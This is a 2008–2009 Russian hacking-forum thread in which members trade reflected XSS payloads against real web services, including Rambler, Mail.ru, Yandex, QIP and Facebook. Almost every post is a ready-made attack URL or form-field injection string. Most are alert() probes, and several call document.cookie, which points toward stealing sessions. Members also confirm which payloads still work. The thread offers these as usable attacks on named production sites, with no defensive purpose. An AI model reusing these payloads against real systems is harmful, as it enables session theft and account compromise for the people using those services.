Пассивные xss на почтовых серверах

Discussion in 'Уязвимости Mail-сервисов' started by Constantine, 25 Oct 2008.

  1. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Выкладываем только пассивные xss на почтовых серверах (для активных xss существует отдельная тема)

    Оффтоп наказуем

    p\s Невозбраняется выложить рабочии xss из аналогичной темы (в разделе Уязвимости), что канула в лету
     
    3 people like this.
    1. TreV@N

      TreV@N Elder - Старейшина

      Joined:
      14 Jul 2008
      Messages:
      135
      Likes Received:
      48
      Reputations:
      19
      rambler.ru

      http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert%20('XSS')%3C/script%3E
       
      qwaszx000, tnAnGel, Fuckel and 2 others like this.
      1. cash$$$

        cash$$$ Banned

        Joined:
        6 Jan 2008
        Messages:
        385
        Likes Received:
        246
        Reputations:
        10
        http://top100.rambler.ru/cgi-bin/reg...p=0&reg=accept

        Во всех полях вставляем "><script>alert('xss')</script>

        http://goon.ru/i/phone/rus_moscow.htm

        В поле Поиск по фамилии "><script>alert('xss')</script>

        http://catalog.aport.ru/rus/add/AddUrl.aspx

        В Адрес ресурса вставляем "><script>alert('xss')</script>
         
        1. TreV@N

          TreV@N Elder - Старейшина

          Joined:
          14 Jul 2008
          Messages:
          135
          Likes Received:
          48
          Reputations:
          19
          Ramber.ru

          http://ds.rambler.ru/index.php?p=news&pubId=1365&pubMode="><script>alert(/TreV@N/)</script>

          http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5"><script>alert('TreV@N')</script>&form=0&hu=1&what=0

          http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0&hu=1&what=0"><script>alert('TreV@N')</script>

          http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0"><script>alert('TreV@N')</script>&hu=1&what=0
           
          2 people like this.
          1. S0ulVortex

            S0ulVortex Elder - Старейшина

            Joined:
            18 Nov 2007
            Messages:
            161
            Likes Received:
            85
            Reputations:
            10
            Решил выложить XSS найденную лично мной
            Code:
            http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
             
            1 person likes this.
            1. foopi

              foopi Member

              Joined:
              26 Oct 2008
              Messages:
              41
              Likes Received:
              20
              Reputations:
              5
              пара уязвимостей на qip:
              http://pochta.qip.ru/mailbox/find/?actionID=1&search=%22%3E%3Cscript%3Ealert()%3C/script%3E
              http://file.qip.ru/preview.jsp?w=200'&h=200'&s=no&b=yes&l=http://slipknot1.ru%22%3E%3C/iframe%3E%3Cscript%3Ealert()%3C/script%3E
               
              1. .dimoN.

                .dimoN. Elder - Старейшина

                Joined:
                8 Apr 2008
                Messages:
                76
                Likes Received:
                56
                Reputations:
                5
                по твоему же примеру
                Code:
                http://nova.rambler.ru/srch?query=%3C%2Fscript%3E%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E
                 
                1. cash$$$

                  cash$$$ Banned

                  Joined:
                  6 Jan 2008
                  Messages:
                  385
                  Likes Received:
                  246
                  Reputations:
                  10
                  http://inbox.uz/
                  '><script>alert(/xss/)</script>
                  Уязвимые поля Логин и пароль.
                   
                  1. Ded MustD!e

                    Ded MustD!e Banned

                    Joined:
                    23 Aug 2007
                    Messages:
                    392
                    Likes Received:
                    694
                    Reputations:
                    405
                    http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script>
                    http://rasp.yandex.ru/info/996500"><script>alert('XSS')</script>
                    http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script>
                    http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cookie)</script>
                    http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.cookie)</script>
                    http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script>
                    http://www.pisem.net/download.php/?file="><script>alert('XSS')</script>
                    http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>
                    http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>
                     
                    #9 Ded MustD!e, 23 Nov 2008
                    Last edited: 23 Nov 2008
                    3 people like this.
                    1. Luccifer

                      Luccifer Elder - Старейшина

                      Joined:
                      5 Dec 2006
                      Messages:
                      49
                      Likes Received:
                      39
                      Reputations:
                      -4
                      http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

                      http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>

                      http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

                      http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert('Luccifer')</script>

                      http://top100.rambler.ru/cgi-bin/register.cgi?group=49&reg=accept
                      в поле URL Вашей страницы:
                      Код:
                      "><script>alert(document.cookie)</script
                       
                      #10 Luccifer, 25 Nov 2008
                      Last edited: 25 Nov 2008
                      1. Luccifer

                        Luccifer Elder - Старейшина

                        Joined:
                        5 Dec 2006
                        Messages:
                        49
                        Likes Received:
                        39
                        Reputations:
                        -4
                        Mail.сру
                        http://content.mail.ru/search?q=%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E

                        http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1=phrase=&proto=1&url=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&title=&descr=&owner=&cperson=&email=&phone=&fax=&address=&keywords=&session_id=16073130&category_id=10993&category_name=%CC%E5%E4%E8%F6%E8%ED%E0+%E8+%E7%E4%EE%F0%EE%E2%FC%E5&page=1&save=1

                        http://hosting.mail.ru/lc.jsp?loginput=&login=%22%3E%3Cscript%3Ealert('Luccifer')%3C%2Fscript%3E&password=


                        http://infobox.ru/index.php?=action=go&domain=%22%3E%3Cscript%3Ealert('Luccifer')%3C%2Fscript%3E&tld=ru&x=21&y=4


                        http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
                        В поле сайтайта URL вводим:
                        "><script>alert('Luccifer')</script>


                        http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E=470


                        http://hosting.mail.ru/
                        в поле логин вводим
                        Код:
                        "><script>alert('xss')</script>
                         
                        #11 Luccifer, 25 Nov 2008
                        Last edited: 25 Nov 2008
                        1 person likes this.
                        1. ImpLex

                          ImpLex Member

                          Joined:
                          12 Dec 2008
                          Messages:
                          23
                          Likes Received:
                          20
                          Reputations:
                          5
                          http://ds.rambler.ru/index.php?p=news&pubId=000000000000000000000000000000000000000000000003&pubMode=%3Cscript%3Ealert()%3C/script%3E
                          Была активная XSS, но топик для пассивных.
                           
                          1. S0ulVortex

                            S0ulVortex Elder - Старейшина

                            Joined:
                            18 Nov 2007
                            Messages:
                            161
                            Likes Received:
                            85
                            Reputations:
                            10
                            Ну опять хсс убитого рамблера на котором даже те что есть не фиксят.
                            http://ftpsearch.rambler.ru/db/ftpsearch/search.html?btnG=%CD%E0%E9%F2%E8%21&words=(XSS)=5&form=0&hu=1&what=0

                            </title><script>alert('S0ulVortex')</script>
                             
                            #13 S0ulVortex, 19 Dec 2008
                            Last edited: 19 Dec 2008
                            1 person likes this.
                            1. Jazz

                              Jazz Elder - Старейшина

                              Joined:
                              27 Sep 2008
                              Messages:
                              80
                              Likes Received:
                              2
                              Reputations:
                              -1
                              http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
                              В поле сайтайта URL вводим:
                              "><script>alert('Luccifer')</script>


                              http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E=470

                              уже не работают?или я не то делаю?
                               
                              1. yarbabin

                                yarbabin HACKIN YO KUT

                                Joined:
                                21 Nov 2007
                                Messages:
                                1,663
                                Likes Received:
                                916
                                Reputations:
                                363
                                не работают.
                                Code:
                                http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%3C/textarea%3E%27%22%3E%3Cscript%3Ealert('xss%20by%20f02')%3C/script%3E
                                эта работает.
                                 
                                _________________________
                                #15 yarbabin, 26 Dec 2008
                                Last edited: 26 Dec 2008
                                1. The matrix

                                  The matrix Elder - Старейшина

                                  Joined:
                                  9 Jul 2008
                                  Messages:
                                  93
                                  Likes Received:
                                  186
                                  Reputations:
                                  138
                                  Хз. Может кто и находил. Просто рамблер совсем не фиксит XSS. Иметь там почтовый ящик не знающим просто опасно
                                   
                                  1 person likes this.
                                  1. iddqd

                                    iddqd Banned

                                    Joined:
                                    19 Dec 2007
                                    Messages:
                                    637
                                    Likes Received:
                                    519
                                    Reputations:
                                    19
                                    Gala.net
                                    Code:
                                    http://forum.gala.net/?ff=1012&page=search&q=%22%2F%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&opt=and
                                     
                                    1 person likes this.
                                    1. iddqd

                                      iddqd Banned

                                      Joined:
                                      19 Dec 2007
                                      Messages:
                                      637
                                      Likes Received:
                                      519
                                      Reputations:
                                      19
                                      ВШтате
                                      Code:
                                      http://vshtate.ru/reg?op=message&email=[COLOR=Yellow][B][XSS][/COLOR][/B]
                                      Но если авторизован, то не пашет :(
                                      Короче, бесполезная :(
                                      В профиле при добавлении инфы во многие поля срабатывает код, но сохраняется в отфильтрованом виде.
                                      Непохек :(
                                       
                                      3 people like this.
                                      1. OptimaPrime

                                        OptimaPrime Banned

                                        Joined:
                                        30 Mar 2007
                                        Messages:
                                        307
                                        Likes Received:
                                        588
                                        Reputations:
                                        -61
                                        Facebook.com




                                        Code:
                                        http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript
                                        %3Ealert(document.cookie)%3C/script%3E

                                        только толку от нее нету:(
                                         
                                        1 person likes this.
                                        1. lmns

                                          lmns Elder - Старейшина

                                          Joined:
                                          21 Feb 2007
                                          Messages:
                                          195
                                          Likes Received:
                                          111
                                          Reputations:
                                          8
                                          http://yandex.ru/cgi-bin/customize.pl?yxqs="><script>alert("XSS%20from%20lmns")</script>